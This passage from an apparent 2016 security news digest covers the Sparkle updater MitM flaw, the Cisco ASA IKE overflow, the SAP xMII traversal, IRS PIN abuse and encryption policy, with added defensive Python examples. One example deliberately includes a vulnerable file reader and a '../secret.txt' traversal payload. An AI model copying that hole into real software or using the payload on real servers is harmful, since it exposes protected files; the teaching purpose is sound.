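    return b"\x02" + _der_len(len(body)) + body


def rsa_public_key_der(n: int, e: int) -> bytes:
    """PKCS#1 RSAPublicKey ::= SEQUENCE { modulus INTEGER, publicExponent INTEGER }."""
    body = _der_int(n) + _der_int(e)
    return b"\x30" + _der_len(len(body)) + body


def onion_v2_address(n: int, e: int) -> str:
    """v2 hidden-service address as used in 2016: base32 of the first 80 bits
    of SHA-1(DER(public key)). Only 10 digest bytes survive, which is why a
    short prefix is cheap to brute-force while a full 16-character match is not.
    (v3 addresses introduced later are derived differently and are 56 chars.)"""
    digest = hashlib.sha1(rsa_public_key_der(n, e)).digest()
    return base64.b32encode(digest[:10]).decode("ascii").lower() + ".onion"


def common_prefix_len(a: str, b: str) -> int:
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


def check_onion_address(expected: str, candidate: str) -> Tuple[str, int]:
    """Compare a candidate against the known-good address as a whole and
    report how many leading characters of the label happened to match."""
    exp_label, exp_rest = expected.lower().split(".", 1)
    cand_label, cand_rest = candidate.lower().split(".", 1)
    shared = common_prefix_len(exp_label, cand_label)
    if cand_rest != exp_rest:
        return ("wrong-domain", shared)  # e.g. a clearnet .me.pn lookalike
    if cand_label == exp_label:
        return ("match", shared)
    return ("lookalike", shared)  # same TLD, different key behind it


if __name__ == "__main__":
    print(onion_v2_address(TOY_MODULUS, TOY_EXPONENT))
    real = "pwoah7foa6au2pul.onion"
    for cand in ("pwoah7f5ivq74fmp.onion", "pwoah7foa6au2pul.me.pn", real):
        print(cand, check_onion_address(real, cand))
```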
The FBI requests $38 Million to counter the threat of Going Dark
12.2.2016 Crime
The FBI requests $38 Million to counter the threat of Going Dark, in particular asking more economic resources to break encryption when needed.
FBI Director James Comey has highlighted on several occasions the difficulties law enforcement faces when dealing with encryption during investigations.
Now the FBI is making its budget request for next year, in particular asking for more resources to break encryption when needed.
Looking at the FBI's Fiscal Year 2017 Budget Request document, it is possible to find a specific section titled "Going Dark" that reads as follows:
“Going Dark: $38.3 million and 0 positions The requested funding will counter the threat of Going Dark, which includes the inability to access data because of challenges related to encryption, mobility, anonymization, and more. The FBI will develop and acquire tools for electronic device analysis, cryptanalytic capability, and forensic tools. Current services for this initiative are 39 positions (11 agents) and 31.0 million.”
The FBI asked for $38.3 million more on top of the $31 million already requested in 2015 (a total of $69.3 million) to improve its capabilities to obtain encrypted data and de-anonymize Internet users.
These numbers demonstrate a significant effort by law enforcement to overcome the "going dark" problem.
In December, the FBI’s Director James Comey called for tech companies currently providing users with end-to-end encryption to review “their business model” and stop implementing it.
End-to-end encryption allows users to communicate securely on the Internet, making it impossible for law enforcement to eavesdrop on the traffic.
The IT giants implemented the end-to-end encryption in response to the disconcerting revelations of the NSA whistleblower Edward Snowden about mass surveillance operated by the US Government.
“FBI Director James Comey on Wednesday called for tech companies currently offering end-to-end encryption to reconsider their business model, and instead adopt encryption techniques that allow them to intercept and turn over communications to law enforcement when necessary.” reported The Intercept.
In the past, FBI Director James Comey had already asked IT giants to insert a backdoor into their products to allow law enforcement to decrypt data, but the companies' reply was negative.
The US authorities have been pressuring companies like Apple and Google in public hearings to provide law enforcement access to decrypted communications whenever there’s a lawful request.
Given the negative response of the IT companies, it is not surprising that the FBI and intelligence agencies will opt for hacking techniques to break encryption.
"The days of reliable wiretaps are vanishing. [Hacking] is the next best thing for the FBI," Christopher Soghoian, the principal technologist at the American Civil Liberties Union, told Lorenzo Bicchierai of Motherboard.
It is likely the FBI will spend that money to buy hacking tools, including spyware and zero-day exploits, for its investigations.
“38.3 million dollars buys a hell of a lot of malware and zero-day exploits,” added Soghoian.
The FBI has already used hacking techniques during its investigations, in particular to de-anonymize criminals on the dark web. A few weeks ago, more details emerged about the operation conducted against TorMail in 2013.
Hey, Apple User! Check If You are also Affected by the Sparkle Vulnerability
12.2.2016 Apple
A pair of new security vulnerabilities has been discovered in a framework used by a wide variety of Mac apps that leaves them open to Man-in-the-Middle (MitM) attacks.
The framework in question is Sparkle that a large number of third-party OS X apps, including Camtasia, uTorrent, Duet Display and Sketch, use to facilitate automatic updates in the background.
Sparkle is open source software available on GitHub under the permissive MIT license, maintained by the Sparkle Project with the help of numerous valuable contributors. The framework supports Mac OS X versions 10.7 through 10.11 and Xcode 5.0 through 7.0.
The Sparkle vulnerabilities, discovered by a security researcher known as Radek in late January and reported by an Ars reporter, affect Apple Mac apps that use:
An outdated and vulnerable version of the Sparkle updater framework.
An unencrypted HTTP channel to receive info from update servers.
What's the Issue?
The first loophole is due to improper use of the Sparkle Updater framework by app developers.
App developers are using an unencrypted HTTP URL to check for new updates, rather than an SSL-encrypted (HTTPS) channel.
As a result, an attacker in the same network could perform MitM attacks and inject malicious code into the communication between the end user and the server, potentially allowing an attacker to gain full control of your computer.
Video Proof-of-Concept Attack
You can watch the proof-of-concept (PoC) attack video that shows a working attack conducted against a vulnerable version of the Sequel Pro app:
Another proof-of-concept attack was shared by fellow researcher Simone Margaritelli using an older version of VLC Media Player, which has now been updated to patch the vulnerability.
Margaritelli showed how he exploited the flaw on a fully patched Mac running a then-latest version of VLC media player using a technique that streamlines the attack by letting it work with the Metasploit exploit framework.
Another less severe bug in Sparkle has also been discovered by Radek that could be exploited against poorly configured update servers, potentially allowing an attacker to replace an update file with a malicious one.
The Sparkle vulnerabilities affected both Mac OS X Yosemite and the most recent version of OS X El Capitan.
Who's Affected?
The Sparkle vulnerabilities affect third-party apps distributed outside the Mac App Store, downloaded manually from the Internet by the user, that use an outdated version of Sparkle.
Although the actual number of affected apps is not known, Radek estimated the number could be "huge."
Among the affected apps are uTorrent (version 1.8.7), Camtasia 2 (version 2.10.4), Sketch (version 3.5.1), and DuetDisplay (version 1.5.2.4).
Check if You're Affected
Check this list of apps that use the Sparkle Updater framework. If you have installed any of these apps on your Mac, you may be at risk of being hacked.
Note: Not all of the listed apps communicate over unencrypted HTTP channels or use an outdated version of the framework.
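A practical way to make that check, as an added example that is neither the article's nor the Sparkle project's code: read each app's Info.plist, flag an update feed (SUFeedURL) that is not HTTPS, note whether an update-signing key (SUPublicDSAKeyFile) is configured, and report the bundled Sparkle version for comparison with the patched release. The two plists below are constructed samples; `audit_applications` assumes the standard macOS /Applications bundle layout.

```python
import plistlib
from pathlib import Path
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Constructed sample plists (not from any real app).
INSECURE_APP_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>CFBundleIdentifier</key><string>com.example.insecureapp</string>
  <key>SUFeedURL</key><string>http://updates.example.com/appcast.xml</string>
</dict></plist>"""

HARDENED_APP_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>CFBundleIdentifier</key><string>com.example.hardenedapp</string>
  <key>SUFeedURL</key><string>https://updates.example.com/appcast.xml</string>
  <key>SUPublicDSAKeyFile</key><string>dsa_pub.pem</string>
</dict></plist>"""

NO_SPARKLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>CFBundleIdentifier</key><string>com.example.plainapp</string>
</dict></plist>"""


def audit_info_plist(plist_bytes: bytes,
                     sparkle_version: Optional[str] = None) -> Dict[str, object]:
    """Check one app's Info.plist for the weaknesses the article describes.
    SUFeedURL (appcast URL) and SUPublicDSAKeyFile (update-signing key) are
    real Sparkle Info.plist keys; a plain-http feed is the MitM condition."""
    info = plistlib.loads(plist_bytes)
    feed = info.get("SUFeedURL")
    findings: List[str] = []
    if feed is None:
        return {"uses_sparkle": False, "feed_url": None,
                "sparkle_version": sparkle_version, "findings": findings}
    scheme = urlparse(feed).scheme.lower()
    if scheme != "https":
        findings.append(f"appcast fetched over {scheme or 'unknown scheme'}: "
                        "an on-path attacker can rewrite the update feed")
    if "SUPublicDSAKeyFile" not in info:
        findings.append("no SUPublicDSAKeyFile: downloads are not signature-checked")
    if sparkle_version is None:
        findings.append("bundled Sparkle version unknown: compare the framework "
                        "manually against the patched Sparkle release")
    return {"uses_sparkle": True, "feed_url": feed,
            "sparkle_version": sparkle_version, "findings": findings}


def audit_app_bundle(app_dir: Path) -> Dict[str, object]:
    """Audit a real .app on disk. Sparkle's own Info.plist carries the
    framework version in CFBundleShortVersionString."""
    fw_plist = app_dir / "Contents/Frameworks/Sparkle.framework/Resources/Info.plist"
    version = None
    if fw_plist.exists():
        version = plistlib.loads(fw_plist.read_bytes()).get("CFBundleShortVersionString")
    return audit_info_plist((app_dir / "Contents/Info.plist").read_bytes(), version)


def audit_applications(root: Path = Path("/Applications")) -> Dict[str, Dict[str, object]]:
    """Walk the applications folder and report only apps that use Sparkle."""
    report: Dict[str, Dict[str, object]] = {}
    for app in sorted(root.glob("*.app")):
        if (app / "Contents/Info.plist").exists():
            result = audit_app_bundle(app)
            if result["uses_sparkle"]:
                report[app.name] = result
    return report


if __name__ == "__main__":
    for name, result in audit_applications().items():
        print(name, result["sparkle_version"], result["feed_url"])
        for finding in result["findings"]:
            print("   -", finding)
```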
How to Protect Yourself against the Issues?
Although Sparkle has provided a fix for both the vulnerabilities in the newest version of the Sparkle Updater, it is not so easy to install the patch.
Radek warns in an email that the major problem is that developers must update the Sparkle framework inside their own apps, which is not trivial.
The update process requires a developer to:
Download the latest version of Sparkle Updater
Check if the latest version of Sparkle is compatible with their app
Create test cases, verify the update process and so on
Address this security issue and publish a new version of their app
Once this is done, users can check for the app update and download the newest version of the particular app to their computers.
Until this is done, users who are not sure if an app on their computers is safe should avoid unsecured Wi-Fi networks or, alternatively, use a Virtual Private Network (VPN).
In the meanwhile, if you get a prompt for an app update, rather than updating the app via the update window itself, simply visit the app's official website and download the latest version from there, just to make sure that you’re downloading what you actually intend to.
US Intelligence confirms the ISIS used chemical weapons
12.2.2016 Hacking
According to Fox News, the Director of National Intelligence confirmed to the Senate that the Islamic State has used chemical weapons.
In December, a European Parliament report warned that the ISIS organization has already smuggled CBRN material into the EU; the risk of WMD attacks is real.
Intelligence experts speculate that IS has recruited experts with chemistry, physics and computer science degrees to wage attacks with weapons of mass destruction.
“ISIS actually has already acquired the knowledge, and in some cases the human expertise, that would allow it to use CBRN materials as weapons of terror.” said Wolfgang Rudischhauser, Director of the Weapons of Mass Destruction Non-Proliferation Centre at NATO.
The shocking revelation is included in a European Parliament report that confirms ISIS "may be planning to try to use internationally banned weapons of mass destruction in future attacks."
According to Fox News, the Director of National Intelligence James Clapper confirmed to the Senate on Tuesday that the Islamic State has used weapons of mass destruction (WMDs).
The Islamic State group has used chemical weapons on the battlefield. Clapper did not say where the WMDs had been used, but he confirmed that in many cases ISIS members have used the dreaded weapons.
“(The Syrian government) has used chemicals against the opposition on multiple occasions since Syria joined the Chemical Weapons Convention. ISIL has also used toxic chemicals in Iraq and Syria, including the blister agent sulfur mustard,” he stated.
Fox News had already published images and videos showing that ISIS members were testing chemical weapons. The images showed burns and blistering on
“Photos taken by the Kurds in northern Iraq last summer and fall and reviewed by Fox News show burns and blistering on the skin that a source on the ground there said are consistent with the use of chemical agents. The agents were described as “odorless, colorless and absorbed through the clothing,” causing burns or illness hours later.” wrote FoxNews.
This is the first official confirmation from the US intelligence community that members of the Islamic State have used WMDs. The fear of a possible attack in Europe or the US is high; a chemical weapon deployed in a city could kill thousands of civilians.
“The perceived success of attacks by homegrown violent extremists in Europe and North America, such as those in Chattanooga and San Bernardino, might motivate others to replicate opportunistic attacks with little or no warning, diminishing our ability to detect terrorist operational planning and readiness,” he stated.
The availability of chemical weapons definitely raises the level of the threat posed by the radical group.
Once again identity thieves use stolen SSNs in IRS attack
12.2.2016 Computer Attack
The IRS detected unauthorized attempts using roughly 464,000 unique SSNs, and 101,000 of those attempts allowed crooks to generate PINs.
The U.S. Internal Revenue Service (IRS) recently confirmed that cyber criminals abused the Electronic Filing PIN application.
The Electronic Filing PIN application is running on irs.gov and allows taxpayers to generate a PIN that they can use to file tax returns online. The information necessary to obtain this PIN is the name, date of birth, mailing address and of course, the SSN.
Unfortunately, it is quite easy for identity thieves to obtain SSNs online from the dumps resulting from the numerous data breaches of recent months.
SSNs, along with other PII, are easy to acquire on the various black markets; the data breaches at Anthem and CareFirst, for example, put data on millions of customers on the market.
The criminals feed this information to an automated bot that generates PINs through the E-File service. In January, the Internal Revenue Service detected unauthorized attempts using roughly 464,000 unique SSNs, and the bad news is that 101,000 of those attempts allowed crooks to generate PINs.
The agency highlighted that its systems were not breached and no taxpayer data has been exposed.
“The IRS recently identified and halted an automated attack upon its Electronic Filing PIN application on IRS.gov. Using personal data stolen elsewhere outside the IRS, identity thieves used malware in an attempt to generate E-file PINs for stolen social security numbers. An E-file pin is used in some instances to electronically file a tax return.” the IRS said in a statement. “No personal taxpayer data was compromised or disclosed by IRS systems.”
“IRS cybersecurity experts are currently assessing the situation, and the IRS is working closely with other agencies and the Treasury Inspector General for Tax Administration. The IRS also is sharing information with its Security Summit state and industry partners.”
The tax agency has already notified the affected users, sending an email to inform them that their accounts have been secured against tax-related identity theft.
A similar incident occurred in May 2015 when the Internal Revenue Service’s Get Transcript system was accessed by unauthorized parties using stolen information.
More than 100,000 taxpayers were affected by the unauthorized accesses, while the total number of accounts breached exceeded 300,000.
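The pattern the IRS describes, one source submitting many distinct stolen SSNs in quick succession to mint PINs, is detectable at the application layer. The detector below is an added example, not IRS code; it runs over constructed log lines (with a keyed SSN hash in place of the SSN, which should never be logged) and flags any client that presents more distinct SSNs inside a sliding window than a real household ever would. The threshold and window are assumptions to tune per service.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Tuple

# Constructed sample log for a PIN-issuing endpoint: timestamp, client
# address, keyed hash of the submitted SSN, outcome. Not real IRS data.
SAMPLE_LOG = """\
2016-01-15T10:00:01Z 203.0.113.7 ssn=a91f outcome=REJECTED
2016-01-15T10:00:02Z 203.0.113.7 ssn=b2c4 outcome=PIN_ISSUED
2016-01-15T10:00:02Z 203.0.113.7 ssn=c77e outcome=REJECTED
2016-01-15T10:00:03Z 203.0.113.7 ssn=d013 outcome=REJECTED
2016-01-15T10:00:04Z 203.0.113.7 ssn=e5a0 outcome=PIN_ISSUED
2016-01-15T10:00:05Z 203.0.113.7 ssn=f8b9 outcome=REJECTED
2016-01-15T10:00:05Z 203.0.113.7 ssn=0a1b outcome=REJECTED
2016-01-15T10:00:06Z 203.0.113.7 ssn=1c2d outcome=PIN_ISSUED
2016-01-15T10:03:10Z 198.51.100.20 ssn=77e1 outcome=REJECTED
2016-01-15T10:04:42Z 198.51.100.20 ssn=77e1 outcome=REJECTED
2016-01-15T10:05:30Z 198.51.100.20 ssn=77e1 outcome=PIN_ISSUED
2016-01-15T11:20:00Z 192.0.2.55 ssn=9d9d outcome=PIN_ISSUED
"""

Event = Tuple[datetime, str, str]  # (timestamp, ssn_id, outcome)


def parse_line(line: str) -> Tuple[str, Event]:
    """Split one log line into (source address, event)."""
    ts, src, ssn_field, outcome_field = line.split()
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return src, (when, ssn_field.split("=", 1)[1], outcome_field.split("=", 1)[1])


def detect_automated_pin_generation(
    lines: Iterable[str],
    window: timedelta = timedelta(minutes=10),  # assumed tuning value
    max_distinct_ssns: int = 5,                 # a household never exceeds this
) -> Dict[str, Dict[str, int]]:
    """Flag clients whose peak number of distinct SSNs inside any window
    exceeds the threshold. A legitimate filer retrying one SSN stays under it;
    a bot cycling through a breach dump does not."""
    by_src: Dict[str, List[Event]] = defaultdict(list)
    for line in lines:
        if line.strip():
            src, event = parse_line(line)
            by_src[src].append(event)

    flagged: Dict[str, Dict[str, int]] = {}
    for src, events in by_src.items():
        events.sort()
        in_window: Counter = Counter()   # ssn_id -> occurrences inside window
        left, peak = 0, 0
        for when, ssn, _ in events:
            in_window[ssn] += 1
            # Slide the left edge forward until the window fits.
            while when - events[left][0] > window:
                old = events[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            peak = max(peak, len(in_window))
        if peak > max_distinct_ssns:
            flagged[src] = {
                "attempts": len(events),
                "distinct_ssns": len({e[1] for e in events}),
                "max_distinct_in_window": peak,
                "pins_issued": sum(1 for e in events if e[2] == "PIN_ISSUED"),
            }
    return flagged


if __name__ == "__main__":
    for src, stats in detect_automated_pin_generation(SAMPLE_LOG.splitlines()).items():
        print(src, stats)
```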
Deep Web Search Engines to Explore the Hidden Internet
11.2.2016 Safety
Do you know: There is a vast section of the Internet which is hidden and not accessible through regular search engines and web browsers.
This part of the Internet is known as the Deep Web, and it is about 500 times the size of the Web that we know.
What is DEEP WEB?
The Deep Web refers to data that is not indexed by any standard search engine such as Google or Yahoo.
The 'Deep Web' refers to all web pages that search engines cannot find, such as user databases, registration-required web forums, webmail pages, and pages behind paywalls.
Then, there's the Dark Web or Dark Net – a specific part of that hidden Deep Web.
The Deep Web and the Dark Web are intriguing topics for netizens everywhere. But when you hear the terms 'Deep Web' or 'Dark Web,' do you lump them together as one?
If yes, then you are wrong.
What is DARK WEB?
The Dark Web is where you can operate without being tracked, maintaining total anonymity.
The Dark Web is much smaller than the Deep Web and is made up of all different kinds of websites that sell drugs, weapons and even hire assassins.
These are hidden networks that keep themselves off the Surface Web, and their URLs end in .onion.
These [websitename].onion domains are not indexed by regular search engines, so you can only access the Dark Web with special software -- the Tor Browser (Tor, 'The Onion Router').
Tor is free, and anyone can download it.
Many of us heard about the Dark Web when the largest online underground marketplace Silk Road was taken down following an investigation by United States federal authorities.
But what if you could still dig into Darknet content with your regular browser, without needing Tor?
Here's How to Surf & Search the Deep Web without TOR
Solution: Deep Web Search Engines
Search engines like Google are incredibly powerful, but they can't crawl and index the vast amount of data that is not hyperlinked or accessed via public DNS services.
However, there are Deep Web Search Engines that crawl over the TOR network and bring the same result to your regular browser.
Some such Dark Web search engines are:
Onion.City
Onion.to
Not Evil
Memex Deep Web Search Engine
Here are some Deep Web Search Engines:
The WWW Virtual Library
Collection of Deep Web Research Tools
Surfwax
IceRocket
Stumpedia
Freebase
TechDeepWeb
These Deep Web search engines talk to the onion service through Tor relays, resolve the .onion links and then deliver the final output to your regular browser on the ordinary World Wide Web.
However, there is one consequence of browsing the Deep or Dark Web in a regular browser: working this way makes these .onion search results visible to you, to me and also to Google.
Moreover, tracker-less search engines – like Disconnect, DDG, IXQuick – are also popular in the Tor culture, as they keep your searches private.
Importance of TOR
It is worth noting that merely using Tor is not illegal, but it can arouse the suspicion of law enforcement.
Tor has long been used by journalists, researchers and thrill seekers in heavily censored countries to hide their web browsing habits and physical location, crawl the Deep Web and exchange information anonymously.
However, one of the main reasons behind the rise of TOR is NSA's Surveillance Programs.
After the Assange and Snowden revelations of recent years, the public feared that their privacy was being compromised over the Internet.
Trust in the Internet had been lost, and encryption was needed to thwart the federal agencies' efforts. Hence the need for Tor.
With the help of Tor, web users could roam the Internet without fear, keeping themselves and their real identities hidden from federal and intelligence agencies.
This is why Tor is one of the favorite targets of federal agencies.
Since Tor has long been a target of the government intelligence agencies, most online users do not feel safe to use Tor anymore.
To learn how easy it is for government agencies to unmask Tor users, you can read these articles:
How Spies Could Unmask Tor Users without Cracking Encryption
How Hacking Team and FBI planned to Unmask A Tor User
Who lurks in the 'Dark Web'?
According to a recent survey conducted by researchers Daniel Moore and Thomas Rid (in their paper Cryptopolitik and the Darknet), 57% of the Dark Web hosts illicit content such as pornography, illicit finance, drug markets, weapons trafficking, counterfeit currency and more.
Netizens have given the Dark Web a shade of illegality. This is why today the Dark Web is defined as something illegal rather than as a 'pool of information.'
However, there are countless reasons to use the Dark Web; ultimately, it is up to the surfer what to surf.
Dismissing the Dark Web as a place for criminal offenses often obscures the legitimate purposes inside it.
In the end, I just want to say:
Knowledge is Free! Happy Surfing!
ENCRYPT Act of 2016 — Proposed Bill Restricts States to Ban Encryption
11.2.2016 Security
Last year's ISIS-linked terror attacks in Paris and California sparked a debate on encryption, and intelligence agencies revived their efforts to weaken encryption in various products and services.
But, there is some Good News!
A California Congressman and a Texas Republican are now challenging state-level proposals to restrict US citizens' ability to encrypt their smartphones.
On Wednesday, California Congressman Ted Lieu, one of four members of Congress, and Texas Republican Blake Farenthold, a member of the House Oversight and House Judiciary committees, introduced a new bill in Congress that attempts to block states' efforts to implement their own anti-encryption policies at the state level while a national debate on encryption is ongoing.
The bill, called "Ensuring National Constitutional Rights for Your Private Telecommunications Act of 2016" – in short, "ENCRYPT Act of 2016" – would stop states from individually trying to make major companies change their technology to fulfil law enforcement requirements.
The bill comes almost a month after two state bills in California and New York proposed to ban the sale of smartphones equipped with strong cryptography that cannot be unlocked and accessed by the manufacturer.
ENCRYPT ACT of 2016
Here's what the "ENCRYPT Act of 2016" reads [PDF]:
A State or political subdivision of a State may not order or request that a manufacturer, seller, developer, or provider of covered products or services:
Design, alter or modify the security features in its product or service in an effort to allow the surveillance of its users, or to allow the physical search of such product or service by any federal agency or instrumentality of a State, a political subdivision of a State, or, of course, the United States.
Have the ability to decrypt or otherwise provide intelligible information that is encrypted or otherwise rendered unintelligible using its product or service.
Although privacy advocates have largely applauded the new bill, it would need to pass both the House of Representatives and the Senate, and be signed by the President, in order to take effect.
However, many federal officials, including FBI Director James Comey, would not be happy with the proposed bill, as they have been pushing major companies to provide backdoor access to their services.
As Comey previously stressed, "There're plenty of companies today that [offer] secure services to their customers and still comply with court orders. There are plenty of folks who make good phones [and can] unlock them in response to a court order."
But in my opinion, no backdoor can help law enforcement and intelligence agencies tackle terrorism.
Would Handing Over a Backdoor to the Federal Agencies Help?
As I previously said, "Technically, there is no such backdoor that only the government can access. If surveillance tools can exploit the vulnerability by design, then an attacker who gained access to it would enjoy the same privilege."
Even if these backdoors did not create vulnerabilities for hackers to attack, we do not trust the government that is asking for backdoor encryption keys.
Recently, the Department of Justice (DoJ) was hacked by an unknown attacker who on Monday leaked personal data belonging to roughly 20,000 FBI agents and 9,000 DHS employees.
A similar thing happened last year when the US Office of Personnel Management (OPM) was hacked multiple times, exposing extremely sensitive security records of over 21.5 million government employees.
These incidents show that government agencies fail to protect their most sensitive data, so they cannot be trusted to keep backdoor encryption keys safe from hackers.
A Million Cisco ASA Firewalls potentially vulnerable to attacks
11.2.2016 Vulnerebility
A flaw in Cisco ASA Software could allow an unauthenticated, remote attacker to cause a reload of the affected system or to remotely execute code.
It's a bad period for IT manufacturers: recently the security community has discovered serious and anomalous vulnerabilities affecting popular products like Juniper equipment and Fortinet FortiOS firewalls.
Now it is Cisco's turn, with the Cisco ASA firewall product line, a family of devices sold as appliances, blades or even virtual systems.
The Cisco ASA Adaptive Security Appliance is an IP router that acts as an application-aware firewall, network antivirus, intrusion prevention system, and virtual private network (VPN) server.
The most pressing aspect is that Cisco claims there are over a million of these deployed.
Security experts David Barksdale, Jordan Gruskovnjak, and Alex Wheeler of Exodus Intelligence have discovered a critical buffer overflow vulnerability (CVE-2016-1287) that received a CVSS (Common Vulnerability Scoring System) score of 10.
“The algorithm for re-assembling IKE payloads fragmented with the Cisco fragmentation protocol contains a bounds-checking flaw that allows a heap buffer to be overflowed with attacker-controlled data. A sequence of payloads with carefully chosen parameters causes a buffer of insufficient size to be allocated in the heap which is then overflowed when fragment payloads are copied into the buffer. Attackers can use this vulnerability to execute arbitrary code on affected devices.” is the summary published by Exodus Intel.
It is quite easy for an attacker to exploit the vulnerability in Cisco ASA by sending crafted UDP packets to the vulnerable system. An exploit could allow the attacker to obtain full control of the system.
The impact is serious considering that over a million Cisco ASA firewalls have already been deployed worldwide.
“A vulnerability in the Internet Key Exchange (IKE) version 1 (v1) and IKE version 2 (v2) code of Cisco ASA Software could allow an unauthenticated, remote attacker to cause a reload of the affected system or to remotely execute code.” states the Advisory published by CISCO.
“The vulnerability is due to a buffer overflow in the affected code area. An attacker could exploit this vulnerability by sending crafted UDP packets to the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system or to cause a reload of the affected system.”
Which devices are affected?
The Cisco ASA Software running on the following products may be affected by this vulnerability:
Cisco ASA 5500 Series Adaptive Security Appliances
Cisco ASA 5500-X Series Next-Generation Firewalls
Cisco ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
Cisco ASA 1000V Cloud Firewall
Cisco Adaptive Security Virtual Appliance (ASAv)
Cisco Firepower 9300 ASA Security Module
Cisco ISA 3000 Industrial Security Appliance
If you have one of them, patch it as soon as possible.
SAP fixed a flaw in xMII that could open the door to nation-state hackers
10.2.2016 Vulnerebility
SAP fixed a vulnerability in SAP MII that could be used as the starting point of multi-stage attacks aiming to gain control over plant devices and manufacturing systems.
SAP fixed a critical vulnerability in its application that could be exploited by hackers, especially nation-state actors, to compromise industrial manufacturing software. SAP issued a critical software update that patched 23 security vulnerabilities, one of them affecting the SAP Manufacturing Integration and Intelligence (xMII).
The SAP Manufacturing Integration and Intelligence (xMII) solution implements a kind of software hub that connects ERP (Enterprise Resource Planning) software and other enterprise applications with plant floor and Operational Technology (OT) devices.
This specific SAP solution is widely adopted in the energy industry that is known to be a privileged target for state-sponsored hackers.
SAP published its SAP Security Notes February 2016 review along with a summary document containing information on the Patch Day Security Notes, which are released on the second Tuesday of every month and fix flaws in SAP solutions.
According to data provided by SAP, most of the fixed holes affect SAP NetWeaver's J2EE application security, while cross-site scripting is the most common vulnerability type.
A study conducted by Tripwire in January revealed that successful cyber attacks on the energy industry increased in 2015 as never before.
Data published in the report confirmed that 69% of respondents to the Tripwire study declared they “weren’t confident” their company would be able to detect every cyber attack.
According to US Department of Homeland Security in 2014 the companies in the energy industries suffered 245 incidents.
The flaw fixed in SAP xMII is a directory traversal vulnerability that gives an attacker access to the file system of the SAP server, with unpredictable consequences.
Because xMII bridges the business network and the plant floor, attackers could use that foothold to penetrate plant-floor and OT networks and launch attacks against the connected ICS and SCADA systems.
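To make the class of bug concrete, here is an added example (not SAP's code, and not a reconstruction of the actual xMII flaw) showing a naive file-serving routine beside a hardened one. The function names, the served directory layout and the sample files are constructed for the demo.

```python
"""Directory traversal: a vulnerable file-serving handler next to a hardened one.

Illustrative code written for this article; it is not SAP's code and says
nothing about where the xMII flaw actually lived. The served directory and
sample files are constructed for the demo.
"""
import os
import tempfile
from pathlib import Path


def read_file_vulnerable(base_dir: str, user_path: str) -> bytes:
    """Naive join: '../' segments escape base_dir, and an absolute
    user_path makes os.path.join discard base_dir entirely."""
    full = os.path.join(base_dir, user_path)
    with open(full, "rb") as fh:
        return fh.read()


def read_file_hardened(base_dir: str, user_path: str) -> bytes:
    """Resolve the candidate path and refuse anything outside base_dir.

    realpath() collapses '..' and follows symlinks, so a symlink planted
    inside base_dir that points outside is rejected too. commonpath()
    avoids the prefix bug where '/srv/files' also matches '/srv/files2'.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError(f"path escapes base directory: {user_path!r}")
    with open(candidate, "rb") as fh:
        return fh.read()


def demo() -> dict:
    """Constructed tree: a public file plus a 'secret' outside the served root."""
    root = Path(tempfile.mkdtemp())
    served = root / "public"
    served.mkdir()
    (served / "report.txt").write_bytes(b"quarterly report")
    (root / "secret.txt").write_bytes(b"db password")

    results = {}
    results["legit_vuln"] = read_file_vulnerable(str(served), "report.txt")
    results["legit_hard"] = read_file_hardened(str(served), "report.txt")
    # The traversal payload succeeds against the naive join...
    results["traversal_vuln"] = read_file_vulnerable(str(served), "../secret.txt")
    # ...and is rejected by the hardened version.
    try:
        read_file_hardened(str(served), "../secret.txt")
        results["traversal_hard"] = "ALLOWED"
    except PermissionError:
        results["traversal_hard"] = "BLOCKED"
    # Absolute path: os.path.join drops base_dir; the hardened check still holds.
    try:
        read_file_hardened(str(served), str(root / "secret.txt"))
        results["absolute_hard"] = "ALLOWED"
    except PermissionError:
        results["absolute_hard"] = "BLOCKED"
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

Note that the check is done on the resolved path, not on the raw string: stripping `../` from input is not sufficient, because encodings, symlinks and absolute paths all bypass string filters.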
“Any vulnerability affecting SAP MII can be used as a starting point of multi-stage attacks aiming to get control over plant devices and manufacturing systems,” Alexander Polyakov, CTO of SAP and Oracle security specialists ERPScan, told El Reg. “Similar attack scenarios were presented by us at the BlackHat conference but for the oil and gas [industry] in particular.”
Windows 10 Sends Your Data 5500 Times Every Day Even After Tweaking Privacy Settings
10.2.2016 Security
Myth: Disabling all privacy-compromising and telemetry features on Windows 10 stops Microsoft from tracking your activities.
Fact: Even with every telemetry feature disabled, Windows 10 phones home far more than you would expect.
Ever since the launch of Microsoft's newest operating system, Windows 10 has been suspected of spying on its users. I wrote a number of articles raising concerns about Windows 10 privacy issues, including its controversial data mining and privacy-invading features.
The only solution believed to address these issues was to disable all telemetry features, or to use an automated tool that disables every privacy-infringing feature in one click.
Unfortunately, a recent analysis by a Voat user known as CheesusCrust claims those efforts are wasted: Microsoft still tracks you even after you lock down Windows 10 privacy settings as far as they go.
Traffic Analysis Reveals Extent of Windows 10 Spying
Curious about the extent of Windows 10 spying, CheesusCrust set up a Windows 10 Enterprise virtual machine on his Linux laptop, behind a DD-WRT router that he used to monitor traffic.
He also disabled every tracking and telemetry feature in the operating system, then left the machine running Windows 10 idle overnight to record the connections the OS attempted to make.
The results are not so surprising:
Eight hours later, he found that the idle Windows 10 box had attempted over 5,500 connections to 93 different IP addresses, of which almost 4,000 went to 51 IP addresses belonging to Microsoft.
After 30 hours, the list had grown to 113 non-private IP addresses, which the tester argued widens the opportunity for third parties to intercept the data.
DisableWinTracking
Taking the test a step further, CheesusCrust reinstalled the Windows 10 Enterprise virtual machine, disabled all tracking features and additionally ran a third-party tool called DisableWinTracking.
This reduced the count to 2,758 connections to 30 different IP addresses over 30 hours.
